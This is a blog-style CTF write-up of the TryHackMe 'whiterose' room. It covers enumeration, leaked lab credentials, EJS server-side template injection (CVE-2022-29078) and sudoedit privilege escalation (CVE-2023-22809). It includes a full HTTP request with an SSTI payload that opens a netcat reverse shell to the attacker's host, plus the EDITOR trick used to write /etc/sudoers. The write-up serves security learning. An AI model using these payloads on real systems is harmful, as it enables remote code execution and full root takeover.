whiterose - d3adair.xyz

![[5f9c7574e201fe31dad228fc-1726214297023 1.png]] # TryHackMe Mr. Robot-themed CTF ### Room Link: https://tryhackme.com/r/room/whiterose Starting off, we are provided with some possible credentials by the room author. These will come in handy later. `Olivia Cortez:olivi8` ## Enumeration Initial Nmap scan. We are provided with SSH and HTTP on Port 80 as our two available ports. ```shell root@ip-10-10-195-163:~# nmap -sC -sV -T4 10.10.61.90 Starting Nmap 7.60 ( https://nmap.org ) at 2024-10-31 04:08 GMT Nmap scan report for ip-10-10-61-90.eu-west-1.compute.internal (10.10.61.90) Host is up (0.0078s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b9:07:96:0d:c4:b6:0c:d6:22:1a:e4:6c:8e:ac:6f:7d (RSA) | 256 ba:ff:92:3e:0f:03:7e:da:30:ca:e3:52:8d:47:d9:6c (ECDSA) |_ 256 5d:e4:14:39:ca:06:17:47:93:53:86:de:2b:77:09:7d (EdDSA) 80/tcp open http nginx 1.14.0 (Ubuntu) |_http-server-header: nginx/1.14.0 (Ubuntu) |_http-title: Site doesn't have a title (text/html). MAC Address: 02:CE:BB:ED:21:A7 (Unknown) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` I ran an additional Nmap scan just to confirm that no other ports were open on the target. ```shell root@ip-10-10-195-163:~# nmap -sS -p- -n -Pn --min-rate=9362 10.10.61.90 Starting Nmap 7.60 ( https://nmap.org ) at 2024-10-31 04:11 GMT Nmap scan report for 10.10.61.90 Host is up (0.00078s latency). Not shown: 65533 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 02:CE:BB:ED:21:A7 (Unknown) ``` Attempting to visit the site running on Port 80 at ==hxxp://10.10.195.163== results in a redirect to ==hxxp://cyprusbank.thm/== - We next add this entry to the /etc/hosts file so we can access the webpage. ![[whiterosewebpage.jpg]] Next step was to try fuzzing for possible hidden or exposed web server directories using ffuf. `''root@ip-10-10-195-163:~# ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.61.90/FUZZ` ```shell root@ip-10-10-195-163:~# ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.61.90/FUZZ ``/'___\ /'___\ /'___\`` ``/\ \__/ /\ \__/ __ __ /\ \__/`` ``\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\`` ``\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/`` ``\ \_\ \ \_\ \ \____/ \ \_\`` ``\/_/ \/_/ \/___/ \/_/`` ``v1.3.1`` ________________________________________________ :: Method : GET :: URL : http://10.10.61.90/FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405 ________________________________________________ ``` Following this, using the credentials provided to us on the room page, I decided to go for the low-hanging fruit and attempted to login via SSH which was unsuccessful. ```shell root@ip-10-10-195-163:~# ssh "Olivia Cortez"@10.10.61.90 The authenticity of host '10.10.61.90 (10.10.61.90)' can't be established. ECDSA key fingerprint is SHA256:QkIJ0yGIYzHBrE9TwbpkPzvqv//FiqyaoC979YHjslY. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.10.61.90' (ECDSA) to the list of known hosts. Olivia [email protected]'s password: ``` Additional fuzzing to check for possible subdomains of cyprusbank.thm domain with a filter for the "57" response size. ```shell root@ip-10-10-122-175:~# ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.cyprusbank.thm" -u http://cyprusbank.thm -fs 57 ``/'___\ /'___\ /'___\`` ``/\ \__/ /\ \__/ __ __ /\ \__/`` ``\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\`` ``\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/`` ``\ \_\ \ \_\ \ \____/ \ \_\`` ``\/_/ \/_/ \/___/ \/_/`` ``v1.3.1`` ________________________________________________ :: Method : GET :: URL : http://cyprusbank.thm :: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt :: Header : Host: FUZZ.cyprusbank.thm :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405 :: Filter : Response size: 57 ________________________________________________ www [Status: 200, Size: 252, Words: 19, Lines: 9] admin [Status: 302, Size: 28, Words: 4, Lines: 1] :: Progress: [100000/100000] :: Job [1/1] :: 2785 req/sec :: Duration: [0:00:13] :: Errors: 0 :: root@ip-10-10-122-175:~#` ``` Added the newly discovered subdomains to the /etc/host file. Below is a resource to assist with enumerating vhosts and adding them to your hosts file. https://www.freecodecamp.org/news/virtual-host-enumeration-tutorial/ ```shell root@ip-10-10-122-175:~# cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 tryhackme.lan tryhackme 10.10.145.36 cyprusbank.thm 10.10.145.36 www.cyprusbank.thm 10.10.145.36 admin.cyprusbank.thm #The following lines are desirable for IPv6 capable hosts ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters ``` The ==cyprusbank.thm== subdomain provides us with the same page as the original site. However the ==admin.cyprusbank.thm== subdomain redirects us to a login page at ==admin.cyprusbank.thm== from which we can then log in using the credentials provided to us at the beginning of the exercise. ![[loginpage.jpg]] Enumeration of the /messages/ directory provides more hidden chat messages with working credentials for admin user. `http://admin.cyprusbank.thm/messages/?c=5` `http://admin.cyprusbank.thm/search?name=Tyrell+Wellick` Obtained admin user credentials by modifying the "c=" parameter to 10 instead of 5. ``` User: Gayle Bev Password: p~]P@5!6;rs558:q ``` Admin user provides us with access to customer password reset screen. Attempted to fuzz the /settings directory for additional accepted interesting parameters. ```shell ffuf -u 'http://admin.cyprusbank.thm/settings' -X POST -H 'Content-Type: application/x-www-form-urlencoded' -H 'Cookie: connect.sid=s%3A8NHTNQ85X-ubUye6rk1kErFlBfKsDYk4.UZBdo4KJXoAMneRXKXi1pSdr6lttgPdqBm0m6SH%2F7oI' -mc all -d 'name=test&password=test&FUZZ=test' -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt -t 100 -fs 2098 ``` ## Initial Access #### <u>Note:</u> This CTF involves exploiting a template engine to achieve Server-Side Template Injection (SSTI) which is a vulnerability that I was a bit unfamiliar with and which required some additional studying on my end. I added a couple of links below to provide some memory refreshers to assist me with understanding this vulnerability along with some techniques on how to detect this vulnerability on a target and exploit it. #### Reading: https://portswigger.net/web-security/server-side-template-injection https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection Opening up BurpSuite, we request made to the admin.cyprusbank.thm/settings page to determine what template engine is running on the web server. We can see that it is running "EJS" which is a specific JavaScript templating engine. Googling for this specific template engine and any recent vulnerabilities we come across CVE-2022-29078. ![[Screenshot 2024-11-05 191915.png]] Reading up on this vulnerability, it appears that by passing an unrestricted render option via the `view options` parameter of `renderFile`, which makes it possible to inject code into `outputFunctionName`. There is a PoC provided in the article below. https://security.snyk.io/vuln/SNYK-JS-EJS-2803307 ```http POST /settings HTTP/1.1 Host: admin.cyprusbank.thm Content-Length: 161 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://admin.cyprusbank.thm Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://admin.cyprusbank.thm/settings Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: connect.sid=s%3AenirWqBT7ALAvSv3svTuMhTFFsaI5OZ2.iX%2Fw9tb%2F%2F17Af7FZ7OcS16I6jwsp0qwTc0sl1M%2Fa7Ts Connection: close name=a&password=bbbb&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('busybox nc 10.10.147.205 1337 -e sh');s ``` From here, I used RevShells to create a simple Netcat shell to be used in the request parameter. After configuring a Netcat listener on my attacker machine, I received connection from the web server and subsequently upgraded to an interactive shell with Python. https://www.revshells.com/ ```shell root@ip-10-10-147-205:~# nc -lvnp 1337 Listening on [0.0.0.0] (family 0, port 1337) Connection from 10.10.40.139 60538 received! python3 -c 'import pty; pty.spawn("/bin/bash")' web@cyprusbank:~/app$ ``` ## Privilege Escalation The initial shell even we were given even after attempting to upgrade it prevented me from modifying the admin.cyprusbank.thm entry in Nano or Vim without crashing the shell. I provided a helpful resource below which might help you with spawning your own upgraded shell. https://0xmrmasry.medium.com/upgrading-simple-shells-to-fully-interactive-ttys-eeeea1e6654e ```shell python3 -c 'import pty; pty.spawn("/bin/bash")' ctrl + z stty raw -echo; fg export TERM=xterm ``` Results of running `sudo -l` on the target machine. We are allowed to run the `sudoedit` command on the target as root. ```shell web@cyprusbank:~/app$ sudo -l sudo -l Matching Defaults entries for web on cyprusbank: env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass User web may run the following commands on cyprusbank: (root) NOPASSWD: sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm web@cyprusbank:~/app$ ``` Googling for *sudoedit* privilege escalation exploits I came across a few different resources which provided some additional documentation for this Linux local privilege escalation vulnerability along with a few examples on how it can be exploited. https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf https://roadtooscp.medium.com/sudoedit-local-privilege-escalation-vulnerability-cve-2023-22809-23ad28e3c70 **Explanation in-context:** Essentially, `sudoedit` allows users to choose their editor using environment variables such as `SUDO_EDITOR`, `VISUAL`, or `EDITOR`. Since the values of these variables can be not only the editor itself but also the arguments to pass to the chosen editor, `sudo` uses `--` while parsing them to separate the editor and its arguments from the files to open for editing. This means that by using the `--` argument in the editor environment variables, we can force it to open files other than those allowed in the `sudoedit` command we can run. Consequently, since we can execute `sudoedit` as `root` with `sudo`, we can edit any file we want as `root`. To use this vulnerability for privilege escalation, there are many files we could write to. In this case, we can simply choose to write to the `/etc/sudoers` file to grant ourselves full `sudo` privileges. **Exploiting the vulnerability.** ```shell web@cyprusbank:~/app$ export EDITOR="nano -- /etc/sudoers" web@cyprusbank:~/app$ sudo sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm ``` Adding the following line: *web ALL=(ALL) NOPASSWD: ALL* To the sudoers file will grant the current user full sudo privileges. Result of running "sudo -l" after adding desired command to the nano file we were given access to. ```shell web@cyprusbank:~/app$ sudo -l Matching Defaults entries for web on cyprusbank: env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass User web may run the following commands on cyprusbank: (root) NOPASSWD: sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm (ALL) NOPASSWD: ALL ``` Running `sudo su -` allowed us to finally upgrade to the root user. Run the following command to acquire the root flag. ```shell root@cyprusbank:~# cat /root/root.txt ``` Root flag acquired.